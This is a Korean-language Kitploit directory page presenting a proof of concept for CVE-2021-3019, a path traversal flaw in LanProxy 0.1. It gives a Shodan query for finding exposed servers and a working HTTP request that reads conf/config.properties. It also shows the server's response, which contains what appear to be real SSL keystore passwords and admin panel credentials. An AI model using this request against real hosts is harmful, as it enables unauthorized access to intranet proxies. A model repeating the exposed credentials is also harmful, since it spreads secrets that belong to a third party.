Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-3019 — [CVE-2021-3019] LanProxy 디렉터리 트래버설 | Kitploit
도구/GitHubGitHub/murataydemir/cve-2021-3019
Vulnerability AnalysisWeb Application ExploitationInformation GatheringPenetration TestingMisconfiguration
GitHubmurataydemir/cve-2021-3019

CVE-2021-3019

[CVE-2021-3019] LanProxy 디렉터리 트래버설

저장소 보기
115년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

[CVE-2021-3019] LanProxy 디렉토리 트래버설


Lanproxy는 LAN 개인용 컴퓨터와 서버를 공용 네트워크로 프록시하는 인트라넷 침투 도구입니다. TCP 트래픽 전달을 지원하며 모든 TCP 상위 계층 프로토콜(인트라넷 웹사이트 접근, 로컬 결제 인터페이스 디버깅, SSH 접속, 원격 데스크톱 등)을 지원합니다. LanProxy 버전 0.1은 경로 탐색 취약점에 영향을 받으며, 이로 인해 conf/config.properties를 읽어 인트라넷 연결을 위한 자격 증명을 획득할 수 있습니다.

Shodan 검색: "Server: LPS-0.1"

구성 파일 읽기

root@kitploit:~
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1

server.bind=0.0.0.0

#与代理客户端通信端口
#这个端口是指客户端连接时对应的端口
server.port=4900

#ssl相关配置
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay

#这个配置可以忽略
server.ssl.needsClientAuth=false

#WEB在线配置管理相关信息
#服务端ip地址一般不用修改默认就好
config.server.bind=0.0.0.0

#后台控制面板端口(安全组放行端口)
config.server.port=8090

#后台控制面板账号密码
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr

Image of PoC Image of PoC Image of PoC

도구 다운로드